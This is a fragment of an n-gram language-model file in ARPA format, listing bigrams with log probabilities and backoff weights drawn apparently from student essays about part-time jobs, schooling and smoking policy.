-1.645653 independence among -0.048957378
-0.69410884 resistance among -0.048957378
-2.878185 the youth -0.048957378
-2.3729722 The youth -0.048957378
-2.569465 <s> On -0.20946135
-3.0728445 in his\/her -0.048957378
-3.1933482 of his\/her -0.048957378
-2.0428584 make his\/her -0.048957378
-1.9155744 support his\/her -0.048957378
-1.4696376 reduce his\/her -0.048957378
-2.7708824 it promotes -0.048957378
-3.2979217 and duties -0.048957378
-0.6942867 duties assigned -0.048957378
-3.4000094 the virtues -0.048957378
-2.3779159 important virtues -0.048957378
-2.7396104 as hard-work -0.048957378
-2.6395223 , teamwork -0.27955192
-2.709418 with respect -0.048957378
-3.2102208 and respect -0.048957378
-3.3813157 to respect -0.048957378
-0.69396824 much-needed respect -0.048957378
-3.0452757 for authority -0.048957378
-2.569465 <s> Although -0.048957378
-3.2979217 and authorities -0.048957378
-3.6294703 <s> schools -0.048957378
-3.014355 their schools -0.048957378
-3.1828704 a local -0.048957378
-2.8272688 the local -0.048957378
-3.1451926 and local -0.048957378
-2.9430885 their local -0.048957378
-2.7028904 as local -0.048957378
-2.5105898 at local -0.048957378
-1.5382957 local governments -0.048957378
-2.880715 be proactive -0.048957378
-3.2799814 and setting -0.048957378
-2.3317432 when setting -0.048957378
-2.5599043 the appropriate -0.13618872
-2.4667776 an appropriate -0.048957378
-2.4409037 this policy -0.048957378
-3.2358162 a policy -0.048957378
-1.1700908 appropriate policy -0.048957378
-2.1457708 smoking policy -0.048957378
-1.3925304 policy measures -0.048957378
-3.4931862 , avoid -0.048957378
-3.4479775 to avoid -0.048957378
-2.2803774 some pitfalls -0.048957378
-2.9492288 , including -0.048957378
-1.5946901 expenses including -0.048957378
-0.69410884 pitfalls including -0.048957378
-1.2958019 including exploitation -0.048957378
-3.2979217 and abuse -0.048957378
-3.5096595 , excessive -0.048957378
-3.2979217 and absenteeism -0.048957378
-3.2979217 and gross -0.048957378
-0.6942867 gross negligence -0.048957378
-3.014355 their schooling -0.048957378
-1.9687632 our schooling -0.048957378
-1.6467657 main purposes -0.048957378
-0.6942267 relaxation purposes -0.048957378
-1.8381437 : i -0.048957378
-2.1533551 -RRB- attain -0.048957378
-1.8383849 right competency -0.048957378
-3.2799814 and attitude -0.048957378
-3.014355 their attitude -0.048957378
-2.873293 be desired -0.048957378
-2.4549398 their desired -0.048957378
-1.1710447 desired expertise -0.048957378
-3.5096595 , ii -0.048957378
-2.152201 -RRB- finish -0.048957378
-2.8497334 they finish -0.048957378
-2.7320588 not lose -0.048957378
-2.8836398 to lose -0.048957378
-2.3815436 may lose -0.048957378
-1.5359426 even lose -0.048957378
-1.4687891 eventually lose -0.048957378
-1.5378767 lose sight -0.048957378
-1.5957409 complete sight -0.048957378
-1.5961065 potential gains -0.048957378
-3.3624787 the four -0.048957378
-2.9977748 their four -0.048957378
-2.2278552 these four -0.048957378
-1.17113 four corners -0.048957378
-2.8842342 the classroom -0.048957378
-3.0907614 <s> Thus -0.187397
-0.6942267 h. Thus -0.048957378
-3.1586366 a balance -0.048957378
-3.2177634 the balance -0.048957378
-2.377721 to balance -0.048957378
-2.0400174 must balance -0.048957378
-2.1349201 social balance -0.048957378
-2.3897834 life balance -0.048957378
-1.8294846 right balance -0.048957378
-2.7713203 not necessarily -0.048957378
-2.3748312 many points -0.048957378
-1.5961901 three points -0.048957378
-3.4000094 the argument -0.048957378
-1.5381981 second argument -0.048957378
-1.2958871 end unless -0.048957378
-2.8842342 the decision -0.048957378
-3.4204583 the attainment -0.048957378
-3.2676826 of organizational -0.048957378
-2.3987331 fs organizational -0.048957378
-3.2799814 and socially -0.048957378
-0.99501497 communicate socially -0.048957378
-3.321535 the current -0.048957378
-3.3813157 to current -0.048957378
-2.9787707 their current -0.048957378
-2.3608074 The current -0.048957378
-2.3961296 may consist -0.048957378
-3.120598 is mainly -0.048957378
-0.6942267 consist mainly -0.048957378
-3.102048 is fast -0.048957378
-3.244391 of fast -0.048957378
-1.1706803 moving fast -0.048957378
-2.7186737 or manual -0.048957378
-2.709418 with invaluable -0.048957378
-2.326847 are invaluable -0.048957378
-1.9419398 provide invaluable -0.048957378
-1.1700908 gaining invaluable -0.048957378
-2.401619 fs targeted -0.048957378
-2.7708678 <s> Balancing -0.04895735
-2.7857137 work schedules -0.048957378
-2.7024844 or schedules -0.048957378
-1.8370627 class schedules -0.048957378
-3.2979217 and arranging -0.048957378
-3.2799814 and effective -0.048957378
-1.9459537 provide effective -0.048957378
-2.672149 can assist -0.048957378
-2.1393735 will assist -0.187397
-3.1451926 and assist -0.048957378
-3.3187766 to assist -0.048957378
-2.484846 jobs assist -0.048957378
-2.5385072 should assist -0.048957378
-3.0728445 in becoming -0.048957378
-3.1764908 and becoming -0.048957378
-3.1933482 of becoming -0.048957378
-3.3489213 to becoming -0.048957378
-1.1696702 fast becoming -0.048957378
-3.321535 the daily -0.048957378
-2.728165 and daily -0.187397
-2.9787707 their daily -0.048957378
-1.7681487 enjoy daily -0.048957378
-1.5961065 both presently -0.048957378
-2.9150915 to prepare -0.13618872
-2.2324088 help prepare -0.048957378
-3.0382125 for car -0.048957378
-3.2908964 a car -0.048957378
-1.6926183 start post -0.048957378
-0.99501497 car post -0.048957378
-1.733112 graduation careers -0.048957378
-2.4503036 their careers -0.048957378
-1.645653 professional careers -0.048957378
-2.880715 be passed -0.048957378
-2.873293 be extremely -0.048957378
-2.0867398 become extremely -0.048957378
-3.644728 <s> Potential -0.048957378
-2.880715 be impressed -0.048957378
-2.532656 at interviews -0.048957378
-3.4479775 to cities -0.048957378
-0.6942267 multicultural cities -0.048957378
-1.1710447 lower socio-economic -0.048957378
-0.6942867 socio-economic backgrounds -0.048957378
-3.4650414 to partly -0.048957378
-2.6641047 can complete -0.048957378
-3.1586366 a complete -0.048957378
-3.2177634 the complete -0.048957378
-2.90795 , complete -0.048957378
-3.2905889 to complete -0.048957378
-1.5331545 actually complete -0.048957378
-1.5331545 lose complete -0.048957378
-2.0139093 society professionally -0.048957378
-2.469975 an educated -0.048957378
-2.859086 be contributing -0.048957378
-3.4625692 , contributing -0.048957378
-3.246793 and contributing -0.048957378
-2.0330791 better prepared -0.048957378
-2.8842342 the challenges -0.048957378
-2.7567537 college ends -0.048957378
-2.672149 can develop -0.048957378
-2.8730767 to develop -0.04895735
-2.933356 students develop -0.048957378
-2.392312 also develop -0.048957378
-2.8121924 they develop -0.048957378
-2.6663196 or develop -0.048957378
-2.2898738 one stronger -0.048957378
-1.5957409 develop stronger -0.048957378
-2.2445176 <s> When -0.1765346
-3.5096595 , appropriately -0.048957378
-0.6942867 appropriately dressed -0.048957378
-1.8062247 real consequences -0.048957378
-1.5382957 her actions -0.048957378
-3.644728 <s> She -0.048957378
-2.7044797 can wait -0.048957378
-3.4479775 to wait -0.048957378
-2.0523734 make naive -0.048957378
-0.6942867 naive mistakes -0.048957378
-2.4476333 this critical -0.048957378
-3.102048 is critical -0.048957378
-3.244391 of critical -0.048957378
-3.1293185 in favor -0.048957378
-2.4247963 a variety -0.27955192
-1.1708648 wider variety -0.048957378
-3.014355 their classmates -0.048957378
-1.1708648 again classmates -0.048957378
-2.1669977 but maybe -0.048957378
-2.7852879 time together -0.048957378
-2.7663805 work together -0.048957378
-0.9942178 communicating together -0.048957378
-0.6938276 Living together -0.048957378
-0.6938276 gather together -0.048957378
-3.2799814 and thinking -0.048957378
-3.2676826 of thinking -0.048957378
-2.1214447 much closer -0.048957378
-2.2804153 get along -0.048957378
-1.8225902 my belief -0.187397
-3.4479775 to recognize -0.048957378
-2.5596967 should recognize -0.048957378
-2.7187858 with lectures -0.048957378
-3.106568 in lectures -0.048957378
-3.244391 of lectures -0.048957378
-3.4931862 , meetings -0.048957378
-1.295562 hour meetings -0.048957378
-3.09512 <s> Otherwise -0.048957378
-2.5982223 from poorer -0.048957378
-3.3047535 a disadvantage -0.048957378
-0.995135 disadvantage compared -0.048957378
-2.5949488 from wealthy -0.048957378
-2.8983755 are wealthy -0.048957378
-2.6886988 can pass -0.048957378
-3.428628 , pass -0.048957378
-3.2102208 and pass -0.048957378
-3.3813157 to pass -0.048957378
-3.3624787 the ever -0.048957378
-2.178507 has ever -0.048957378
-1.2834088 without ever -0.048957378
-3.4931862 , experiencing -0.048957378
-1.295562 ever experiencing -0.048957378
-3.106568 in regular -0.048957378
-2.7283971 as regular -0.048957378
-0.9947796 experiencing regular -0.048957378
-2.7972748 have empathy -0.048957378
-2.5593464 in modern -0.187397
-2.3729722 The modern -0.048957378
-3.1293185 in politics -0.048957378
-3.2979217 and justice -0.048957378
-3.644728 <s> Universities -0.048957378
-2.181358 could award -0.048957378
-0.6942867 award credits -0.048957378
-2.387195 do volunteer -0.048957378
-3.4204583 the all-round -0.048957378
-2.562118 should count -0.048957378
-1.4698606 especially towards -0.048957378
-1.294531 particularly towards -0.048957378
-0.9944986 attitude towards -0.048957378
-0.69396824 count towards -0.048957378
-3.0230536 their degrees -0.048957378
-3.644728 <s> School -0.048957378
-3.102048 is expensive -0.048957378
-2.1624105 very expensive -0.048957378
-2.7283971 as expensive -0.048957378
-2.5672007 is costly -0.048957378
-2.5119796 jobs assisting -0.048957378
-1.7693542 For busy -0.048957378
-2.8837602 are busy -0.048957378
-0.69410884 assisting busy -0.048957378
-1.1710447 busy professionals -0.048957378
-1.969951 other sources -0.048957378
-2.7368789 I doubt -0.048957378
-1.9456341 no doubt -0.048957378
-2.1511729 I spent -0.048957378
-2.7969828 be spent -0.048957378
-2.709646 not spent -0.048957378
-2.2275927 time spent -0.048957378
-2.7196925 college spent -0.048957378
-2.0178785 better spent -0.048957378
-1.9363589 years spent -0.048957378
-3.2979217 and figuring -0.048957378
-2.859086 be personally -0.048957378
-3.102048 is personally -0.048957378
-1.5946901 both personally -0.048957378
-3.4204583 the usual -0.048957378
-2.0431418 valuable form -0.048957378
-3.284121 the form -0.048957378
-2.267613 some form -0.048957378
-1.961792 other form -0.048957378
-0.6938276 feedback form -0.048957378
-3.0178597 that profession -0.048957378
-2.873293 be nice -0.048957378
-3.2908964 a nice -0.048957378
-3.4650414 to speed -0.048957378
-2.2804153 get certified -0.048957378
-3.2799814 and receive -0.048957378
-2.9150915 to receive -0.048957378
-1.6466527 degree faster -0.048957378
-1.2956754 expectations faster -0.048957378
-3.4650414 to raise -0.048957378
-2.1238894 their children -0.048957378
-2.3608074 The children -0.048957378
-2.0457513 his children -0.048957378
-0.69396824 longer children -0.048957378
-2.5790641 to choose -0.04895735
-2.821667 they choose -0.048957378
-2.2780018 who choose -0.048957378
-2.328002 would choose -0.048957378
-1.766022 always choose -0.048957378
-3.4650414 to interact -0.048957378
-3.4625692 , community -0.048957378
-2.7024844 or community -0.048957378
-1.5370556 local community -0.048957378
-1.3925304 various epeople-skills -0.048957378
-1.82423 I had -0.048957378
-2.668018 not had -0.048957378
-3.0156138 and had -0.048957378
-2.378885 students had -0.048957378
-2.1354082 but had -0.048957378
-2.693505 college had -0.048957378
-2.7056131 have had -0.048957378
-2.7676923 they had -0.048957378
-2.254748 who had -0.048957378
-1.1671549 myself had -0.048957378
-1.5858314 someone had -0.048957378
-1.8678414 was 14 -0.048957378
-2.410627 also old -0.048957378
-2.8837602 are old -0.048957378
-1.944475 years old -0.048957378
-1.5382957 local pharmacy -0.048957378
-2.0522041 than capable -0.048957378
-2.4667776 an appreciation -0.048957378
-0.6942267 Early appreciation -0.048957378
-3.0607083 is required -0.048957378
-1.4696376 level required -0.048957378
-2.8507237 are required -0.048957378
-1.4687891 effort required -0.048957378
-0.9942178 absolutely required -0.048957378
-2.4199624 by interacting -0.048957378
-2.85306 the public -0.048957378
-3.089379 in public -0.048957378
-3.2102208 and public -0.048957378
-2.4438105 all public -0.048957378
-3.4650414 to juggle -0.048957378
-2.1669266 very surprised -0.048957378
-2.052458 first came -0.048957378
-2.7044797 can bring -0.048957378
-2.8497334 they bring -0.048957378
-2.4184146 more maturity -0.048957378
-3.2649243 a currently -0.048957378
-2.8837602 are currently -0.048957378
-1.865671 Japan currently -0.048957378
-3.0808864 is purely -0.048957378
-1.6444623 just purely -0.048957378
-0.69396824 devoted purely -0.048957378
-0.69396824 facilities purely -0.048957378
-3.644728 <s> Hence -0.048957378
-3.6294703 <s> 1 -0.048957378
-2.8983755 are 1 -0.048957378
-2.3772526 many interesting -0.048957378
-1.9466504 no replacement -0.048957378
-3.601002 <s> 2 -0.048957378
-3.4625692 , 2 -0.048957378
-2.7835681 have 2 -0.048957378
-2.9793792 for everything -0.048957378
-3.3187766 to everything -0.048957378
-2.090273 then everything -0.048957378
-2.7526727 have everything -0.048957378
-2.0895708 If everything -0.048957378
-1.16925 almost everything -0.048957378
-3.0808864 is given -0.048957378
-2.8669279 are given -0.048957378
-2.09662 If given -0.048957378
-1.5935729 been given -0.048957378
-3.601002 <s> 3 -0.048957378
-3.246793 and 3 -0.048957378
-0.9947796 next 3 -0.048957378
-3.0178597 that relates -0.048957378
-3.644728 <s> Sometimes -0.048957378
-3.3047535 a salary -0.048957378
-2.7516315 a resume -0.04895735
-3.6294703 <s> 4 -0.048957378
-1.295562 short 4 -0.048957378
-3.2979217 and mentors -0.048957378
-3.644728 <s> Thank -0.048957378
-2.7267487 will explain -0.048957378
-2.7708678 <s> Reason -0.04895735
-2.920025 to survive -0.048957378
-2.569465 <s> With -0.048957378
-3.3047535 a struggle -0.048957378
-3.4204583 the continual -0.048957378
-2.3748312 many excellent -0.048957378
-2.4667776 an excellent -0.048957378
-2.8272688 the long -0.048957378
-2.7526727 have long -0.048957378
-2.8351026 are long -0.048957378
-2.3940783 life long -0.048957378
-1.4689857 impact long -0.048957378
-0.69368714 Before long -0.048957378
-1.5382957 long length -0.048957378
-3.2676826 of vacation -0.048957378
-1.5378767 long vacation -0.048957378
-3.644728 <s> Which -0.048957378
-2.873293 be greatly -0.048957378
-2.4158804 also greatly -0.048957378
-2.0510054 often wasted -0.048957378
-0.99501497 greatly wasted -0.048957378
-2.1669266 very lazy -0.048957378
-3.2799814 and unproductive -0.048957378
-3.4479775 to unproductive -0.048957378
-3.644728 <s> Or -0.048957378
-1.4711709 late nights -0.048957378
-1.4711709 few nights -0.048957378
-3.0452757 for travel -0.048957378
-2.1071095 young persons -0.048957378
-2.380017 fs growth -0.048957378
-1.766022 personal growth -0.048957378
-1.1696702 mental growth -0.048957378
-0.6938276 persons growth -0.048957378
-0.9942178 sexual growth -0.048957378
-2.0522888 often multicultural -0.048957378
-3.246793 and off -0.048957378
-2.0111368 well off -0.048957378
-1.1706803 paid off -0.048957378
-1.647248 statement eIt -0.048957378
-3.2979217 and employability -0.048957378
-1.6470779 same field\/industry -0.048957378
-2.8842342 the ereal -0.048957378
-2.7713203 not suited -0.048957378
-2.7181385 I look -0.048957378
-2.5843997 to look -0.13618872
-2.5494218 should look -0.048957378
-1.6897244 employers look -0.048957378
-3.4000094 the path -0.048957378
-1.9218646 career path -0.048957378
-3.0230536 their homework\/assignments -0.048957378
-2.569465 <s> At -0.11268411
-2.0524554 valuable input -0.048957378
-3.2102208 and using -0.048957378
-3.21812 of using -0.048957378
-2.7197275 as using -0.048957378
-2.8669279 are using -0.048957378
-3.014355 their initiative -0.048957378
-1.9455216 own initiative -0.048957378
-1.5382957 problem solving -0.048957378
-3.5096595 , communication -0.048957378
-2.5599043 the customer -0.13618872
-3.4931862 , customer -0.048957378
-3.0230536 their uniforms -0.048957378
-2.4324028 <s> Being -0.099168696
-2.5019197 part-time brings -0.048957378
-3.4931862 , brings -0.048957378
-2.880715 be pointed -0.048957378
-1.9468912 provide real-world -0.048957378
-2.708228 can complement -0.048957378
-2.569465 <s> Also -0.20946135
-3.1880362 the spending -0.048957378
-2.698859 not spending -0.048957378
-3.0886452 and spending -0.048957378
-1.8307188 extra spending -0.048957378
-2.0729342 out spending -0.048957378
-1.9314854 own spending -0.048957378
-1.292295 towards spending -0.048957378
-0.6934062 unreasonable spending -0.048957378
-2.5531027 is certainly -0.048957378
-2.7047877 will certainly -0.048957378
-3.428628 , certainly -0.048957378
-1.6444623 degree certainly -0.048957378
-2.859086 be welcome -0.048957378
-3.2649243 a welcome -0.048957378
-1.7693542 always welcome -0.048957378
-3.2085369 a choice -0.048957378
-2.109144 This choice -0.048957378
-1.766022 personal choice -0.048957378
-1.5924584 best choice -0.048957378
-0.9942178 wise choice -0.048957378
-2.208895 which complements -0.048957378
-3.5096595 , looking -0.048957378
-2.7663805 work within -0.048957378
-2.8507237 are within -0.048957378
-1.2942703 burden within -0.048957378
-1.3905429 together within -0.048957378
-2.1427004 smoking within -0.048957378
-3.0382125 for lab -0.048957378
-3.2908964 a lab -0.048957378
-3.2649243 a research -0.048957378
-3.244391 of research -0.048957378
-1.8357562 A research -0.048957378
-1.1710447 research assistant -0.048957378
-3.2908964 a professor -0.048957378
-3.014355 their professor -0.048957378
-3.3047535 a well-paying -0.048957378
-3.2979217 and conveniently -0.048957378
-0.6942867 conveniently located -0.048957378
-3.4204583 the content -0.048957378
-2.880715 be desirable -0.048957378
-2.859086 be interested -0.048957378
-2.9982424 that interested -0.048957378
-2.7556913 not interested -0.048957378
-2.104994 -LRB- although -0.048957378
-2.4562922 this scenario -0.048957378
-0.6942867 scenario leads -0.048957378
-1.1710447 certain existentially -0.048957378
-0.6942867 existentially themed -0.048957378
-0.6942867 themed questions -0.048957378
-3.644728 <s> Regardless -0.048957378
-2.7665153 it profit -0.048957378
-1.7332089 still profit -0.048957378
-3.2979217 and prioritize -0.048957378
-3.120598 is merit -0.048957378
-2.2786872 some merit -0.048957378
-2.4266567 a significant -0.04895735
-1.837133 high expense -0.048957378
-1.1705118 significant expense -0.048957378
-1.5946901 large expense -0.048957378
-3.4204583 the capital -0.048957378
-2.9583905 , thereby -0.048957378
-2.749941 and thereby -0.048957378
-3.2799814 and cover -0.048957378
-2.5943775 to cover -0.04895735
-3.3047535 a bank -0.048957378
-2.6392057 student loan -0.048957378
-3.246793 and loan -0.048957378
-0.69410884 bank loan -0.048957378
-2.121458 even mortgaging -0.048957378
-3.0230536 their house -0.048957378
-3.246793 and puts -0.048957378
-2.1163917 This puts -0.048957378
-0.9947796 institutes puts -0.048957378
-3.28005 of strain -0.048957378
-2.7309246 with financing -0.048957378
-3.428628 , materials -0.048957378
-3.2102208 and materials -0.048957378
-2.349459 study materials -0.048957378
-1.469627 educational materials -0.048957378
-2.9631343 , reducing -0.187397
-2.5628006 the pressure -0.13618872
-3.2979217 and encouraging -0.048957378
-2.4168756 a large -0.099168696
-2.1450179 most large -0.048957378
-1.9487343 at large -0.048957378
-0.9944986 relatively large -0.048957378
-1.5961065 large percentage -0.187397
-3.28005 of shoppers -0.048957378
-1.9701205 take notice -0.048957378
-3.2676826 of changes -0.048957378
-1.8669469 environment changes -0.048957378
-3.1293185 in fashion -0.048957378
-3.2979217 and technology -0.048957378
-2.6972163 can buy -0.048957378
-3.4163227 to buy -0.048957378
-2.2396004 only buy -0.048957378
-2.8842342 the latest -0.048957378
-0.995135 latest products -0.048957378
-1.2958019 thereby reviving -0.048957378
-1.5382957 local shops -0.048957378
-2.859086 be low -0.048957378
-3.2649243 a low -0.048957378
-3.102048 is low -0.048957378
-2.2909184 so shop -0.048957378
-0.6942867 shop owners -0.048957378
-0.99501497 savings onto -0.048957378
-1.8691914 going onto -0.048957378
-3.2391717 to me -0.048957378
-1.6391098 benefit me -0.048957378
-1.3874582 allow me -0.048957378
-1.5880291 made me -0.048957378
-1.4654533 around me -0.048957378
-1.1685529 puts me -0.048957378
-0.6932658 enabled me -0.048957378
-0.6932658 provided me -0.048957378
-0.6932658 gave me -0.048957378
-2.1937845 it seems -0.048957378
-1.8947358 It seems -0.048957378
-2.722524 will carry -0.048957378
-3.2799814 and carry -0.048957378
-1.3925304 various task -0.048957378
-3.2358162 a goal -0.048957378
-2.3608074 The goal -0.048957378
-0.40941563 primary goal -0.048957378
-0.69396824 original goal -0.048957378
-2.859086 be rewarding -0.048957378
-2.1624105 very rewarding -0.048957378
-1.5370556 quite rewarding -0.048957378
-3.4650414 to mention -0.048957378
-3.644728 <s> Basic -0.048957378
-3.644728 <s> Looking -0.048957378
-3.2799814 and seeing -0.048957378
-2.732904 on seeing -0.048957378
-3.4650414 to payback -0.048957378
-3.2102208 and over -0.048957378
-1.8906534 little over -0.048957378
-0.9944986 preferred over -0.048957378
-0.9944986 carry over -0.048957378
-2.1220925 there everyday -0.048957378
-2.1050158 into everyday -0.048957378
-1.3925304 show irresponsible -0.048957378
-1.4715303 eventually breakdown -0.048957378
-2.4476333 this economic -0.048957378
-3.3624787 the economic -0.048957378
-3.244391 of economic -0.048957378
-3.1303647 is happing -0.048957378
-3.644728 <s> Using -0.048957378
-3.3047535 a false -0.048957378
-1.4721353 credit card -0.048957378
-2.9060166 are constantly -0.048957378
-0.6942867 constantly pushing -0.048957378
-1.9691006 take care -0.187397
-1.2956754 taken care -0.048957378
-3.4204583 the bill -0.048957378
-2.842708 be banned -0.21607319
-3.0808864 is banned -0.048957378
-1.7308546 were banned -0.048957378
-1.469627 already banned -0.048957378
-2.7312138 a number -0.187397
-3.321535 the number -0.048957378
-1.5935729 large number -0.048957378
-0.9944986 total number -0.187397
-1.7087959 who goes -0.187397
-1.8669469 environment goes -0.048957378
-2.1655056 you didn -0.048957378
-1.3922309 University didn -0.048957378
-3.3047535 a dime -0.048957378
-1.3925304 University tuitions -0.048957378
-3.2908964 a summer -0.048957378
-3.014355 their summer -0.048957378
-0.995135 summer vacations -0.048957378
-3.4204583 the summers -0.048957378
-2.7708678 <s> Furthermore -0.27955192
-2.349459 study schedule -0.048957378
-2.2162788 work schedule -0.187397
-1.8024169 real schedule -0.048957378
-1.8356878 class schedule -0.048957378
-2.1656544 I got -0.048957378
-1.2240654 after graduating -0.04895735
-3.102048 is already -0.048957378
-1.6885092 have already -0.048957378
-0.9947796 fd already -0.048957378
-1.4715303 already experienced -0.048957378
-2.8842342 the requirements -0.187397
-2.5483203 money c -0.048957378
-2.0129478 well c -0.048957378
-2.873293 be seen -0.048957378
-0.6942267 plainly seen -0.048957378
-3.0090466 for extra-curricular -0.048957378
-3.428628 , extra-curricular -0.048957378
-3.21812 of extra-curricular -0.048957378
-1.9642754 other extra-curricular -0.048957378
-1.7342885 before hiring -0.048957378
-3.3047535 a bubble -0.048957378
-1.6920769 upon leaving -0.048957378
-3.4625692 , leaving -0.048957378
-2.1369052 after leaving -0.048957378
-3.2908964 a head -0.048957378
-2.3987331 fs head -0.048957378
-3.089379 in creating -0.048957378
-3.2102208 and creating -0.048957378
-2.1138942 even creating -0.048957378
-2.1003318 into creating -0.048957378
-3.4204583 the failures -0.048957378
-2.182114 has realistic -0.048957378
-2.8176763 time adjusting -0.048957378
-2.7983925 work \/ -0.048957378
-3.284121 the employees -0.048957378
-1.8010415 restaurant employees -0.048957378
-2.762729 have employees -0.048957378
-1.6881027 These employees -0.048957378
-1.2948219 fellow employees -0.048957378
-3.0178597 that wont -0.048957378
-0.6942867 wont burn -0.048957378
-3.4650414 to gauge -0.048957378
-2.4199624 by assessing -0.048957378
-3.4650414 to multi-task -0.048957378
-3.5096595 , grade -0.048957378
-1.5962766 point averages -0.048957378
-2.7972748 have devised -0.048957378
-3.28005 of formula -0.048957378
-1.1710447 employer feels -0.048957378
-3.2979217 and excels -0.048957378
-2.469975 an assignment -0.048957378
-2.1737337 <s> Finally -0.70552063
-1.295562 h Finally -0.048957378
-3.3624787 the general -0.048957378
-3.106568 in general -0.048957378
-3.246793 and general -0.048957378
-3.644728 <s> Idle -0.048957378
-0.6942867 Idle minds -0.048957378
-2.6507893 student deserves -0.048957378
-3.0452757 for needy -0.048957378
-2.2911956 who face -0.048957378
-3.3624787 the difficulties -0.048957378
-3.244391 of difficulties -0.048957378
-2.0098362 financial difficulties -0.048957378
-3.644728 <s> Incomes -0.048957378
-1.3925304 basic necessities -0.048957378
-3.4931862 , purchase -0.048957378
-2.9767401 students purchase -0.048957378
-3.4931862 , dedication -0.048957378
-3.2799814 and dedication -0.048957378
-1.2958019 towards unreasonable -0.048957378
-3.4204583 the inherent -0.048957378
-1.6926544 These structures -0.048957378
-3.0178597 that exist -0.048957378
-3.644728 <s> Early -0.048957378
-1.6926183 start formal -0.048957378
-1.295562 using formal -0.048957378
-1.2958019 thereby adjust -0.048957378
-3.4479775 to demand -0.048957378
-2.5091865 jobs demand -0.048957378
-0.995135 demand involvement -0.048957378
-3.644728 <s> Both -0.048957378
-2.4003265 my private -0.048957378
-0.6942267 Both private -0.048957378
-3.2676826 of utmost -0.048957378
-3.014355 their utmost -0.048957378
-2.031715 In New -0.048957378
-3.1215048 in New -0.048957378
-0.40954217 New Zealand -0.187397
-3.0178597 that enabled -0.048957378
-2.7972748 have continued -0.048957378
-3.0808864 is tertiary -0.048957378
-2.4081247 by tertiary -0.048957378
-1.8191105 my tertiary -0.048957378
-0.9944986 Attending tertiary -0.048957378
-2.4028242 my monthly -0.048957378
-3.0452757 for housing -0.048957378
-3.0452757 for teenagers -0.048957378
-3.4650414 to move -0.048957378
-3.4650414 to spread -0.048957378
-3.0230536 their wings -0.048957378
-3.644728 <s> Ultimately -0.048957378
-2.1621325 I wanted -0.048957378
-2.162571 you wanted -0.048957378
-1.8930372 really wanted -0.048957378
-3.4650414 to prove -0.048957378
-3.28005 of yourself -0.048957378
-3.644728 <s> Naturally -0.048957378
-2.5259967 at entertainment -0.048957378
-1.5370556 simply entertainment -0.048957378
-1.2950919 including entertainment -0.048957378
-1.2958019 government sponsored -0.048957378
-2.208895 which covered -0.048957378
-2.1230183 there wasn -0.048957378
-2.3099248 be left -0.048957378
-2.5483203 money left -0.048957378
-3.644728 <s> During -0.048957378
-3.3047535 a gas -0.048957378
-0.6942867 gas station -0.048957378
-0.6942267 station attendant -0.048957378
-0.6942267 parking attendant -0.048957378
-3.5096595 , kitchen -0.048957378
-3.4931862 , video -0.048957378
-3.2676826 of video -0.048957378
-0.995135 video rental -0.048957378
-0.6942867 rental clerk -0.048957378
-3.5096595 , parking -0.048957378
-2.7181385 I finally -0.048957378
-3.428628 , finally -0.048957378
-3.2102208 and finally -0.048957378
-1.7685759 he finally -0.048957378
-0.995135 hotel porter -0.048957378
-2.5119796 jobs provided -0.048957378
-2.0330791 better communicative -0.048957378
-3.4650414 to organize -0.048957378
-2.4184146 more efficiently -0.048957378
-2.6392057 student opinions -0.048957378
-2.2278552 these opinions -0.048957378
-1.5955248 three opinions -0.187397
-1.8057122 gain hands -0.048957378
-1.5379899 obtain hands -0.048957378
-3.2908964 a textbook -0.048957378
-3.4000094 the textbook -0.048957378
-2.6507893 student selected -0.048957378
-2.3602743 study programs -0.048957378
-3.5096595 , seeking -0.048957378
-2.9060166 are unsure -0.048957378
-3.2979217 and undecided -0.048957378
-2.8842342 the direction -0.187397
-2.4184146 more options -0.048957378
-3.3047535 a brighter -0.048957378
-3.09512 <s> Third -0.187397
-2.181358 could inspire -0.048957378
-2.920025 to excel -0.048957378
-3.0230536 their senior -0.048957378
-3.644728 <s> Work -0.048957378
-3.4650414 to comprehend -0.048957378
-3.09512 <s> Based -0.187397
-3.1293185 in discovering -0.048957378
-3.3047535 a lifetime -0.048957378
-2.9060166 are helping -0.048957378
-3.4650414 to unmotivated -0.048957378
-1.9466504 no sadder -0.048957378
-0.6942867 sadder story -0.048957378
-3.102048 is finished -0.048957378
-2.178507 has finished -0.048957378
-2.7835681 have finished -0.048957378
-1.1710447 finished 16 -0.048957378
-3.4650414 to run -0.048957378
-2.7044797 can challenge -0.048957378
-1.8055046 real challenge -0.048957378
-2.7972748 have tried -0.048957378
-2.42757 , dealing -0.40449065
-2.4343994 experience dealing -0.048957378
-2.7112274 as dealing -0.048957378
-1.4690876 especially dealing -0.048957378
-1.3902439 though dealing -0.048957378
-3.3047535 a boss -0.048957378
-2.569465 <s> Those -0.048957378
-3.09512 <s> Parents -0.048957378
-3.09512 <s> Doing -0.048957378
-2.418582 also shows -0.048957378
-1.9466504 no longer -0.048957378
-1.692859 upon ourselves -0.048957378
-1.1708648 ask ourselves -0.048957378
-2.3119407 be taught -0.04895735
-3.3047535 a special -0.048957378
-3.2979217 and colleagues -0.048957378
-2.596728 to grow -0.13618872
-2.1375635 up quicker -0.048957378
-2.0331504 about glife -0.048957378
-2.9977748 their kids -0.048957378
-1.3916435 Most kids -0.048957378
-1.94348 own kids -0.048957378
-3.4204583 the correct -0.048957378
-3.644728 <s> Throughout -0.048957378
-3.2979217 and grandparents -0.048957378
-1.7715586 Many youngsters -0.048957378
-2.401619 fs consumerist -0.048957378
-1.9465656 own cell -0.048957378
-0.6942867 cell phones -0.048957378
-0.6942867 phones funded -0.048957378
-3.1293185 in possession -0.048957378
-0.995135 latest games -0.048957378
-3.2799814 and clothes -0.048957378
-0.4095183 fancy clothes -0.048957378
-3.2908964 a wage -0.048957378
-0.99501497 minimum wage -0.048957378
-1.4712842 example communicating -0.048957378
-2.8133025 time communicating -0.048957378
-3.321535 the groups -0.048957378
-2.349459 study groups -0.048957378
-2.144826 social groups -0.048957378
-1.6903851 age groups -0.048957378
-2.1510062 social etiquette -0.048957378
-1.5381981 business etiquette -0.048957378
-0.995135 formal spoken -0.048957378
-0.6942867 spoken language -0.048957378
-2.1621325 I wish -0.13618872
-2.274766 they wish -0.27955192
-2.2860384 who wish -0.048957378
-2.7516315 a teacher -0.048957378
-3.3047535 a nursery -0.048957378
-2.7186737 or cram -0.048957378
-3.1293185 in tourism -0.048957378
-2.532656 at hotels -0.048957378
-1.5382957 local tour -0.048957378
-0.6942867 tour guides -0.048957378
-3.3624787 the weekends -0.048957378
-2.3673859 The weekends -0.048957378
-2.5259967 at weekends -0.048957378
-2.1669266 very challenging -0.048957378
-1.5961065 companies receiving -0.048957378
-0.6942267 receiving thousands -0.048957378
